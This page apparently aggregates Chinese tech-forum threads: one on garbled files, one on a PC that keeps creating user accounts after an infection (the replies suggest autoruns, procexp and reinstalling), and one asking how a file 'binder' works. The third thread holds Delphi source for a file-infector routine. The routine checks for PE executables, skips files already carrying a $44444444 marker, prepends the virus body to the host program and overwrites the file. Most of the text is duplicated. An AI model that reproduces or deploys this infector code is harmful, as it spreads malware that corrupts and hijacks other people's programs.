当前位置: 操作系统/服务器>windows
本页文章导读:
▪哪位高手来速度帮帮妹妹吧,汗死了 谁来速度帮帮妹妹吧,汗死了接到的文件,打开文档都是乱码,我晕死,这可是公司的重要文件那
1是没有该类型文件的软件,找个相应的软件2要是压缩的文件有可能损坏,修复一下试试看3.........
▪ ?操作系统自动创建新用户?解决思路 ??操作系统自动创建新用户?我的电脑前两天中了病毒,现在我如果以一个我原有的系统账号登陆操作系统,总会有一个新的账号创建,而且会重新设置桌面。大家有遇到过这种问题的吗.........
▪ 捆绑机的基本原理(多谢回答!) 捆绑机的基本原理(谢谢回答!!)两个文件流,然后写入内存流,保存文件有如下代码,是他的基本原理吧Delphi(Pascal) code
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
d.........
[1]哪位高手来速度帮帮妹妹吧,汗死了
来源: 互联网 发布时间: 2014-02-18
谁来速度帮帮妹妹吧,汗死了
接到的文件,打开文档都是乱码,我晕死,这可是公司的重要文件那
1是没有该类型文件的软件,找个相应的软件
2要是压缩的文件有可能损坏,修复一下试试看
3后缀名可能被更改,原来的文件是.什么的就改成什么!!
接到的文件,打开文档都是乱码,我晕死,这可是公司的重要文件那
1是没有该类型文件的软件,找个相应的软件
2要是压缩的文件有可能损坏,修复一下试试看
3后缀名可能被更改,原来的文件是.什么的就改成什么!!
[2] ?操作系统自动创建新用户?解决思路
来源: 互联网 发布时间: 2014-02-18
??操作系统自动创建新用户?
我的电脑前两天中了病毒,现在我如果以一个我原有的系统账号登陆操作系统,总会有一个新的账号创建,而且会重新设置桌面。大家有遇到过这种问题的吗?
没有遇到过~
具体是什么情况?
没有啊!是不是系统设置有问题啊?
没见过啊
还有病毒。
还是重装一下吧
进安全模式杀毒看看吧
建议用sysinternals的autoruns看看你启动的时候运行了些什么,就可以一一排除。
先确定一下那帐户不是你装的程序类的创建的
那就应该木马了
难道楼主被啊黑看上了?
不过啊黑一般不会创建另外的用户或留下很明显的痕迹.
杀毒吧
mark
原先的用户是不是是管理员组,有两种可能性,一种是被创建了登陆自动执行建立用户的脚本,可以查看新建立用户的时间,另一个是病毒,这个就比较广泛了,一般病毒如果杀毒软件查杀不了也没什么大惊小怪的,直接重新做系统来的干脆点!
up
从启动项里看一下,关闭不用的启动项!在运行命令中输入msconfig,即可打开系统配置选项!
是后门程序给你开的以后黑客进你电脑就方便了!是什么账户?
这样的问题还不曾见过呢
比较怀疑是黑客
不会别人远程控制了吧?
推荐你一本书,国家反病毒中心写的《网络安全攻防实战》,专门介绍黑客如何入侵,
知己知彼啊,能帮助你分析一下是什么原因。
用procexp看看有没有可疑的进程
用autoruns看看有没有可疑的启动项
我的电脑前两天中了病毒,现在我如果以一个我原有的系统账号登陆操作系统,总会有一个新的账号创建,而且会重新设置桌面。大家有遇到过这种问题的吗?
没有遇到过~
具体是什么情况?
没有啊!是不是系统设置有问题啊?
没见过啊
还有病毒。
还是重装一下吧
进安全模式杀毒看看吧
建议用sysinternals的autoruns看看你启动的时候运行了些什么,就可以一一排除。
先确定一下那帐户不是你装的程序类的创建的
那就应该木马了
难道楼主被啊黑看上了?
不过啊黑一般不会创建另外的用户或留下很明显的痕迹.
杀毒吧
mark
原先的用户是不是是管理员组,有两种可能性,一种是被创建了登陆自动执行建立用户的脚本,可以查看新建立用户的时间,另一个是病毒,这个就比较广泛了,一般病毒如果杀毒软件查杀不了也没什么大惊小怪的,直接重新做系统来的干脆点!
up
从启动项里看一下,关闭不用的启动项!在运行命令中输入msconfig,即可打开系统配置选项!
是后门程序给你开的以后黑客进你电脑就方便了!是什么账户?
这样的问题还不曾见过呢
比较怀疑是黑客
不会别人远程控制了吧?
推荐你一本书,国家反病毒中心写的《网络安全攻防实战》,专门介绍黑客如何入侵,
知己知彼啊,能帮助你分析一下是什么原因。
用procexp看看有没有可疑的进程
用autoruns看看有没有可疑的启动项
[3] 捆绑机的基本原理(多谢回答!)
来源: 互联网 发布时间: 2014-02-18
捆绑机的基本原理(谢谢回答!!)
两个文件流,然后写入内存流,保存文件
有如下代码,是他的基本原理吧
Delphi(Pascal) code
看不懂,还是顶一下啊。
你这个是什么语言写的?貌似是Delphi?
--reply by CSDN Study V1.0.0.3 (starts_2000)
两个文件流,然后写入内存流,保存文件
有如下代码,是他的基本原理吧
Delphi(Pascal) code
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; procedure InfectOneFile(FileName: string); var SelfStream, SrcStream: TFileStream; //两个文件流一个存放自己,一个存放宿主程序 DstStream: TMemoryStream;//将自己和宿主程序合并后存入这个流 iID: LongInt;//取得程序的最后4个字节的数据与感染标记比对 Infected, IsPE: Boolean;//判断是否已被感染和是否为PE文件格式 i: Integer; Buf: array[0..1] of Char; begin try Infected := False; IsPE := False; //创建宿主程序到SrcStream SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //检查PE文件头PE头偏移量一般小于$108(十六进制) begin SrcStream.Seek(i, soFromBeginning);//将流指向文件开始 SrcStream.Read(Buf, 2);//每两个字节读取到buf //#80#69就是字母PE,PE头以PE字母开头 if (Buf[0] = #80) and (Buf[1] = #69) then begin IsPE := True; //是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd); //将流指向文件最后面的倒数第4个字节 SrcStream.Read(iID, 4);//把这4个字节读出来判断是不是$44444444即感染标记 if (iID = ID) or (SrcStream.Size > 1024000) then //大于10M的文件不感染 Infected := True; finally SrcStream.Free; end; if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 Exit; DstStream := TMemoryStream.Create; try //将本程序写入SelfStream流 SelfStream := TFileStream.Create(ParamStr(0), fmOpenRead); try //写入本程序即病毒体到合并流 CopyStream(SelfStream, 0, DstStream, 0, VSize); //再接着写入宿主程序 CopyStream(SrcStream, 0, DstStream, VSize, SrcStream.Size); ////将流指向流的结尾 DstStream.Seek(0, soFromEnd); iID := $44444444; DstStream.Write(iID, 4);//写入4个字节的感染标记 finally SelfStream.Free; end; finally SrcStream.Free; DstStream.SaveToFile(FileName); //替换宿主文件 ,保存文件 DstStream.Free; end; except; end; end;
看不懂,还是顶一下啊。
你这个是什么语言写的?貌似是Delphi?
--reply by CSDN Study V1.0.0.3 (starts_2000)
最新技术文章: